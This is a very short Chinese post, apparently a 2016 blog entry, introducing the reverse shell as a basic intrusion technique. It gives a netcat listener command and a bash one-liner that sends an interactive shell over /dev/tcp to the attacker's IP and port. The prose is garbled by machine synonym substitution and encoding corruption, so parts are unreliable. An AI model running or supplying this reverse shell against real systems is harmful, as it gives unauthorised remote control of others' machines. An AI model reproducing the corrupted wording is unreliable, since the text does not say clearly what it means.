2016-09-12
夢(mèng)飛
210
【Reverse shell】也叫反彈shell,,是滲透進(jìn)攻的根基功,假如你找到時(shí)機(jī)讓遠(yuǎn)端的呆板執(zhí)行你注入的代碼,你的代碼奈何才氣為你生成一個(gè)可以交互操縱的shell呢?你可以在當(dāng)?shù)叵扔胣c啟動(dòng)一個(gè)監(jiān)聽(tīng)歷程【nc -l 端標(biāo)語(yǔ)】,然后在遠(yuǎn)端執(zhí)行【bash -i >& /dev/tcp/你當(dāng)?shù)氐腎P/端標(biāo)語(yǔ) 0>&1】即可。